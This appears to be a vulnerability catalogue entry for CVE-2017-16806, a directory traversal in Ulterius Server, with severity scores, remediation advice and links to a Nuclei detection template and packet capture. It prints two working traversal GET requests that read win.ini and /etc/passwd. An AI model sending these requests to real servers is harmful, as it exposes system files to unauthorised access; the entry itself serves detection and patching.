| Title | Ulterius Server < 1.9.5.0 - Directory Traversal |
|---|---|
| Author | geeknik |
| Severity | High |
| Impact | An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server. |
| Remediation | Upgrade Ulterius Server to version 1.9.5.0 or later to mitigate the directory traversal vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.9018 |
| CVE ID | CVE-2017-16806 |
| CWE ID | CWE-22 |
| Tags | cve2017 cve ulterius traversal edb vuln |
Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.
GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.5
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-16806.yaml
🦈 Packet Capture: ⬇️ Download cve-2017-16806.pcap
N/AN/A